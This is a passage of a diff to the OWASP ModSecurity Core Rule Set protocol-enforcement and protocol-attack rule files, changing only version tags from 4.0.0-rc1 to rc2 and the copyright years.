     SecRule REQUEST_HEADERS:Content-Type "@rx ^(?i)multipart/form-data" \
@@ -518,7 +518,7 @@ SecRule &TX:COMBINED_FILE_SIZES "@eq 1" \
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/210/272',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     chain"
     SecRule FILES_COMBINED_SIZE "@gt %{tx.combined_file_sizes}" \
@@ -539,7 +539,7 @@ SecRule REQUEST_HEADERS:Content-Type "!@rx ^[\w/.+*-]+(?:\s?;\s?(?:action|bounda
     tag:'OWASP_CRS',\
     tag:'capec/1000/255/153',\
     tag:'PCI/12.1',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 SecRule REQUEST_HEADERS:Content-Type "@rx ^[^;\s]+" \
@@ -558,7 +558,7 @@ SecRule REQUEST_HEADERS:Content-Type "@rx ^[^;\s]+" \
     tag:'OWASP_CRS',\
     tag:'capec/1000/255/153',\
     tag:'PCI/12.1',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.content_type=|%{tx.0}|',\
     chain"
@@ -581,7 +581,7 @@ SecRule REQUEST_HEADERS:Content-Type "@rx charset\s*=\s*[\"']?([^;\"'\s]+)" \
     tag:'OWASP_CRS',\
     tag:'capec/1000/255/153',\
     tag:'PCI/12.1',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.content_type_charset=|%{tx.1}|',\
     chain"
@@ -604,7 +604,7 @@ SecRule REQUEST_HEADERS:Content-Type "@rx charset.*?charset" \
     tag:'OWASP_CRS',\
     tag:'capec/1000/255/153',\
     tag:'PCI/12.1',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 SecRule REQUEST_PROTOCOL "!@within %{tx.allowed_http_versions}" \
@@ -622,7 +622,7 @@ SecRule REQUEST_PROTOCOL "!@within %{tx.allowed_http_versions}" \
     tag:'OWASP_CRS',\
     tag:'capec/1000/210/272',\
     tag:'PCI/6.5.10',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 SecRule REQUEST_BASENAME "@rx \.([^.]+)$" \
@@ -641,7 +641,7 @@ SecRule REQUEST_BASENAME "@rx \.([^.]+)$" \
     tag:'OWASP_CRS',\
     tag:'capec/1000/210/272',\
     tag:'PCI/6.5.10',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.extension=.%{tx.1}/',\
     chain"
@@ -663,7 +663,7 @@ SecRule REQUEST_FILENAME "@rx \.[^.~]+~(?:/.*|)$" \
     tag:'OWASP_CRS',\
     tag:'capec/1000/210/272',\
     tag:'PCI/6.5.10',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 SecRule REQUEST_HEADERS_NAMES "@rx ^.*$" \
@@ -682,7 +682,7 @@ SecRule REQUEST_HEADERS_NAMES "@rx ^.*$" \
     tag:'OWASP_CRS',\
     tag:'capec/1000/210/272',\
     tag:'PCI/12.1',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.header_name_920450_%{tx.0}=/%{tx.0}/',\
     chain"
@@ -703,7 +703,7 @@ SecRule REQUEST_HEADERS:Accept-Encoding "@gt 50" \
     tag:'OWASP_CRS',\
     tag:'capec/1000/255/153',\
     tag:'PCI/12.1',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 SecRule REQUEST_HEADERS:Accept "!@rx ^(?:(?:\*|[^!-\"\(-\),/:-\?\[-\]\{\}]+)/(?:\*|[^!-\"\(-\),/:-\?\[-\]\{\}]+)|\*)(?:[\s\v]*;[\s\v]*(?:charset[\s\v]*=[\s\v]*\"?(?:iso-8859-15?|utf-8|windows-1252)\b\"?|(?:[^\s\v -\"\(-\),/:-\?\[-\]c\{\}]|c(?:[^!-\"\(-\),/:-\?\[-\]h\{\}]|h(?:[^!-\"\(-\),/:-\?\[-\]a\{\}]|a(?:[^!-\"\(-\),/:-\?\[-\]r\{\}]|r(?:[^!-\"\(-\),/:-\?\[-\]s\{\}]|s(?:[^!-\"\(-\),/:-\?\[-\]e\{\}]|e[^!-\"\(-\),/:-\?\[-\]t\{\}]))))))[^!-\"\(-\),/:-\?\[-\]\{\}]*[\s\v]*=[\s\v]*[^!\(-\),/:-\?\[-\]\{\}]+);?)*(?:[\s\v]*,[\s\v]*(?:(?:\*|[^!-\"\(-\),/:-\?\[-\]\{\}]+)/(?:\*|[^!-\"\(-\),/:-\?\[-\]\{\}]+)|\*)(?:[\s\v]*;[\s\v]*(?:charset[\s\v]*=[\s\v]*\"?(?:iso-8859-15?|utf-8|windows-1252)\b\"?|(?:[^\s\v -\"\(-\),/:-\?\[-\]c\{\}]|c(?:[^!-\"\(-\),/:-\?\[-\]h\{\}]|h(?:[^!-\"\(-\),/:-\?\[-\]a\{\}]|a(?:[^!-\"\(-\),/:-\?\[-\]r\{\}]|r(?:[^!-\"\(-\),/:-\?\[-\]s\{\}]|s(?:[^!-\"\(-\),/:-\?\[-\]e\{\}]|e[^!-\"\(-\),/:-\?\[-\]t\{\}]))))))[^!-\"\(-\),/:-\?\[-\]\{\}]*[\s\v]*=[\s\v]*[^!\(-\),/:-\?\[-\]\{\}]+);?)*)*$" \
@@ -719,7 +719,7 @@ SecRule REQUEST_HEADERS:Accept "!@rx ^(?:(?:\*|[^!-\"\(-\),/:-\?\[-\]\{\}]+)/(?:
     tag:'attack-protocol',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 SecRule REQBODY_PROCESSOR "!@streq JSON" \
@@ -736,7 +736,7 @@ SecRule REQBODY_PROCESSOR "!@streq JSON" \
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/255/153/267/72',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     chain"
     SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@rx (?i)\x5cu[0-9a-f]{4}" \
@@ -754,7 +754,7 @@ SecRule REQUEST_URI_RAW "@contains #" \
     tag:'attack-protocol',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 SecRule &REQUEST_HEADERS:Content-Type "@gt 1" \
@@ -770,7 +770,7 @@ SecRule &REQUEST_HEADERS:Content-Type "@gt 1" \
     tag:'attack-protocol',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:920013,phase:1,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT"
@@ -789,7 +789,7 @@ SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx ^bytes=(?:(?:\d
     tag:'OWASP_CRS',\
     tag:'capec/1000/210/272',\
     tag:'paranoia-level/2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'WARNING',\
     chain"
     SecRule REQUEST_BASENAME "!@endsWith .pdf" \
@@ -808,7 +808,7 @@ SecRule REQUEST_BASENAME "@endsWith .pdf" \
     tag:'OWASP_CRS',\
     tag:'capec/1000/210/272',\
     tag:'paranoia-level/2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'WARNING',\
     chain"
     SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx ^bytes=(?:(?:\d+)?-(?:\d+)?\s*,?\s*){63}" \
@@ -827,7 +827,7 @@ SecRule ARGS "@rx %[0-9a-fA-F]{2}" \
     tag:'OWASP_CRS',\
     tag:'capec/1000/255/153/267/120',\
     tag:'paranoia-level/2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'WARNING',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.warning_anomaly_score}'"
 SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@validateByteRange 9,10,13,32-126,128-255" \
@@ -844,7 +844,7 @@ SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@validateByteRange 9,10,13,
     tag:'OWASP_CRS',\
     tag:'capec/1000/210/272',\
     tag:'paranoia-level/2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
 SecRule &REQUEST_HEADERS:User-Agent "@eq 0" \
@@ -861,7 +861,7 @@ SecRule &REQUEST_HEADERS:User-Agent "@eq 0" \
     tag:'capec/1000/210/272',\
     tag:'PCI/6.5.10',\
     tag:'paranoia-level/2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'NOTICE',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.notice_anomaly_score}'"
 SecRule FILES_NAMES|FILES "@rx ['\";=]" \
@@ -878,7 +878,7 @@ SecRule FILES_NAMES|FILES "@rx ['\";=]" \
     tag:'OWASP_CRS',\
     tag:'capec/1000/210/272',\
     tag:'paranoia-level/2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
 SecRule REQUEST_HEADERS:Content-Length "!@rx ^0$" \
@@ -894,7 +894,7 @@ SecRule REQUEST_HEADERS:Content-Length "!@rx ^0$" \
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/210/272',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     chain"
     SecRule &REQUEST_HEADERS:Content-Type "@eq 0" \
@@ -916,7 +916,7 @@ SecRule REQUEST_HEADERS_NAMES "@rx ^.*$" \
     tag:'OWASP_CRS',\
     tag:'capec/1000/210/272',\
     tag:'PCI/12.1',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.header_name_920451_%{tx.0}=/%{tx.0}/',\
     chain"
@@ -938,7 +938,7 @@ SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES|REQUEST_BODY "@validateByteR
     tag:'OWASP_CRS',\
     tag:'capec/1000/210/272',\
     tag:'paranoia-level/3',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
 SecRule &REQUEST_HEADERS:Accept "@eq 0" \
@@ -955,7 +955,7 @@ SecRule &REQUEST_HEADERS:Accept "@eq 0" \
     tag:'capec/1000/210/272',\
     tag:'PCI/6.5.10',\
     tag:'paranoia-level/3',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'NOTICE',\
     chain"
     SecRule REQUEST_METHOD "!@rx ^(?:OPTIONS|CONNECT)$" \
@@ -976,7 +976,7 @@ SecRule &REQUEST_HEADERS:x-up-devcap-post-charset "@ge 1" \
     tag:'OWASP_CRS',\
     tag:'capec/1000/210/272',\
     tag:'paranoia-level/3',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     chain"
     SecRule REQUEST_HEADERS:User-Agent "@rx ^(?i)up" \
@@ -997,7 +997,7 @@ SecRule &REQUEST_HEADERS:Cache-Control "@gt 0" \
     tag:'paranoia-level/3',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/210/272',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     chain"
     SecRule REQUEST_HEADERS:Cache-Control "!@rx ^(?:(?:max-age=[0-9]+|min-fresh=[0-9]+|no-cache|no-store|no-transform|only-if-cached|max-stale(?:=[0-9]+)?)(?:\s*\,\s*|$)){1,7}$" \
@@ -1017,7 +1017,7 @@ SecRule REQUEST_HEADERS:Accept-Encoding "!@rx br|compress|deflate|(?:pack200-)?g
     tag:'OWASP_CRS',\
     tag:'capec/1000/255/153',\
     tag:'PCI/12.1',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
 SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:920017,phase:1,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT"
@@ -1036,7 +1036,7 @@ SecRule REQUEST_BASENAME "@endsWith .pdf" \
     tag:'OWASP_CRS',\
     tag:'capec/1000/210/272',\
     tag:'paranoia-level/4',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'WARNING',\
     chain"
     SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx ^bytes=(?:(?:\d+)?-(?:\d+)?\s*,?\s*){6}" \
@@ -1055,7 +1055,7 @@ SecRule ARGS|ARGS_NAMES|REQUEST_BODY "@validateByteRange 38,44-46,48-58,61,65-90
     tag:'OWASP_CRS',\
     tag:'capec/1000/210/272',\
     tag:'paranoia-level/4',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.inbound_anomaly_score_pl4=+%{tx.critical_anomaly_score}'"
 SecRule REQUEST_HEADERS|!REQUEST_HEADERS:User-Agent|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:Cookie|!REQUEST_HEADERS:Sec-Fetch-User|!REQUEST_HEADERS:Sec-CH-UA|!REQUEST_HEADERS:Sec-CH-UA-Mobile "@validateByteRange 32,34,38,42-59,61,65-90,95,97-122" \
@@ -1072,7 +1072,7 @@ SecRule REQUEST_HEADERS|!REQUEST_HEADERS:User-Agent|!REQUEST_HEADERS:Referer|!RE
     tag:'OWASP_CRS',\
     tag:'capec/1000/210/272',\
     tag:'paranoia-level/4',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.inbound_anomaly_score_pl4=+%{tx.critical_anomaly_score}'"
 SecRule REQUEST_HEADERS:Sec-Fetch-User|REQUEST_HEADERS:Sec-CH-UA-Mobile "!@rx ^(?:\?[01])?$" \
@@ -1089,7 +1089,7 @@ SecRule REQUEST_HEADERS:Sec-Fetch-User|REQUEST_HEADERS:Sec-CH-UA-Mobile "!@rx ^(
     tag:'OWASP_CRS',\
     tag:'capec/1000/210/272',\
     tag:'paranoia-level/4',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.inbound_anomaly_score_pl4=+%{tx.critical_anomaly_score}'"
 SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@rx (?:^|[^\x5c])\x5c[cdeghijklmpqwxyz123456789]" \
@@ -1107,7 +1107,7 @@ SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@rx (?:^|[^\x5c])\x5c[cdegh
     tag:'paranoia-level/4',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/153/267',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl4=+%{tx.critical_anomaly_score}'"
diff --git a/rules/@owasp_crs/REQUEST-921-PROTOCOL-ATTACK.conf b/rules/@owasp_crs/REQUEST-921-PROTOCOL-ATTACK.conf
index c07409d..8b62c23 100644
--- a/rules/@owasp_crs/REQUEST-921-PROTOCOL-ATTACK.conf
+++ b/rules/@owasp_crs/REQUEST-921-PROTOCOL-ATTACK.conf
@@ -1,7 +1,7 @@
 # ------------------------------------------------------------------------
-# OWASP ModSecurity Core Rule Set ver.4.0.0-rc1
+# OWASP ModSecurity Core Rule Set ver.4.0.0-rc2
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
-# Copyright (c) 2021-2022 Core Rule Set project. All rights reserved.
+# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
 #
 # The OWASP ModSecurity Core Rule Set is distributed under
 # Apache Software License (ASL) version 2
@@ -24,7 +24,7 @@ SecRule ARGS_NAMES|ARGS|REQUEST_BODY|XML:/* "@rx (?:get|post|head|options|connec
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/210/272/220/33',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -43,7 +43,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/210/272/220/34',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -62,7 +62,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/210/272/220/34',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -81,7 +81,7 @@ SecRule REQUEST_HEADERS_NAMES|REQUEST_HEADERS "@rx [\n\r]" \
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/210/272/220/273',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -100,7 +100,7 @@ SecRule ARGS_NAMES "@rx [\n\r]" \
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/210/272/220/33',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -119,7 +119,7 @@ SecRule ARGS_GET_NAMES|ARGS_GET "@rx [\n\r]+(?:\s|location|refresh|(?:set-)?cook
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/210/272/220/33',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -137,7 +137,7 @@ SecRule REQUEST_FILENAME "@rx [\n\r]" \
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/210/272/220/34',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -155,7 +155,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/248/136',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 SecRule REQUEST_HEADERS:Content-Type "@rx ^[^\s\v,;]+[\s\v,;].*?(?:application/(?:.+\+)?json|(?:application/(?:soap\+)?|text/)xml)" \
@@ -174,7 +174,7 @@ SecRule REQUEST_HEADERS:Content-Type "@rx ^[^\s\v,;]+[\s\v,;].*?(?:application/(
     tag:'OWASP_CRS',\
     tag:'capec/1000/255/153',\
     tag:'PCI/12.1',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 SecRule REQUEST_URI "@rx unix:[^|]*\|" \
@@ -192,7 +192,7 @@ SecRule REQUEST_URI "@rx unix:[^|]*\|" \
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/210/272/220/33',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:921013,phase:1,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
@@ -212,7 +212,7 @@ SecRule ARGS_GET "@rx [\n\r]" \
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/210/272/220/33',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -232,7 +232,7 @@ SecRule REQUEST_HEADERS:Content-Type "@rx ^[^\s\v,;]+[\s\v,;].*?\b(?:((?:tex|mul
     tag:'OWASP_CRS',\
     tag:'capec/1000/255/153',\
     tag:'PCI/12.1',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
 SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:921015,phase:1,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
@@ -251,7 +251,7 @@ SecRule &REQUEST_HEADERS:Range "@gt 0" \
     tag:'paranoia-level/3',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/210/272/220',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
 SecRule ARGS_NAMES "@rx ." \
@@ -265,7 +265,7 @@ SecRule ARGS_NAMES "@rx ." \
     tag:'attack-protocol',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/137/15/460',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     setvar:'TX.paramcounter_%{MATCHED_VAR_NAME}=+1'"
 SecRule TX:/paramcounter_.*/ "@gt 1" \
     "id:921180,\
@@ -280,7 +280,7 @@ SecRule TX:/paramcounter_.*/ "@gt 1" \
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/137/15/460',\
     tag:'paranoia-level/3',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     chain"
     SecRule MATCHED_VARS_NAMES "@rx TX:paramcounter_(.*)" \
@@ -301,7 +301,7 @@ SecRule ARGS_NAMES "@rx (][^\]]+$|][^\]]+\[)" \
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/137/15/460',\
     tag:'paranoia-level/3',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
@@ -321,7 +321,7 @@ SecRule ARGS_NAMES "@rx \[" \
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/137/15/460',\
     tag:'paranoia-level/4',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl4=+%{tx.critical_anomaly_score}'"
diff --git a/rules/@owasp_crs/REQUEST-922-MULTIPART-ATTACK.conf b/rules/@owasp_crs/REQUEST-922-MULTIPART-ATTACK.conf
index bc37854..2667540 100644
--- a/rules/@owasp_crs/REQUEST-922-MULTIPART-ATTACK.conf
+++ b/rules/@owasp_crs/REQUEST-922-MULTIPART-ATTACK.conf
@@ -1,7 +1,7 @@
 # ------------------------------------------------------------------------
-# OWASP ModSecurity Core Rule Set ver.4.0.0-rc1
+# OWASP ModSecurity Core Rule Set ver.4.0.0-rc2
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
-# Copyright (c) 2021-2022 Core Rule Set project. All rights reserved.
+# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
 #
 # The OWASP ModSecurity Core Rule Set is distributed under
 # Apache Software License (ASL) version 2
@@ -21,7 +21,7 @@ SecRule &MULTIPART_PART_HEADERS:_charset_ "!@eq 0" \
     tag:'OWASP_CRS',\
     tag:'capec/1000/255/153',\
     tag:'paranoia-level/1',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     chain"
     SecRule ARGS:_charset_ "!@within |%{tx.allowed_request_content_type_charset}|" \
@@ -42,7 +42,7 @@ SecRule MULTIPART_PART_HEADERS "@rx ^content-type\s*:\s*(.*)$" \
     tag:'OWASP_CRS',\
     tag:'capec/272/220',\
     tag:'paranoia-level/1',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     chain"
